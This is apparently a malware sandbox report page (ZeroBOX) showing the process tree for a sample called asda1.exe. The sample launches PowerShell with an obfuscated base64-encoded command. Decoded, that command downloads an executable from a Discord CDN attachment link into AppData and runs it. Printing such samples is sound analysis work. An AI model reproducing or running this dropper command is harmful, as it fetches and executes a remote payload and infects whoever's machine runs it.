popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • asda1.exe "C:\Users\test22\AppData\Local\Temp\asda1.exe"

    1932

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAagByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUAMQA5ADMAMwAzADUAOAA1ADEAMgA0ADIAMgA5ADkAMgAvADEAMAA1ADEAOQAzADcAOAAyADIAOAA1ADgAMgA5ADcANAAyADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAG0AawBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawB6AHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBsAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAxADMAMwAuAGUAeABlACcAKQApADwAIwB5AGUAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBjAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAxADMAMwAuAGUAeABlACcAKQA8ACMAcQBnAGwAIwA+AA=="

      2124

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf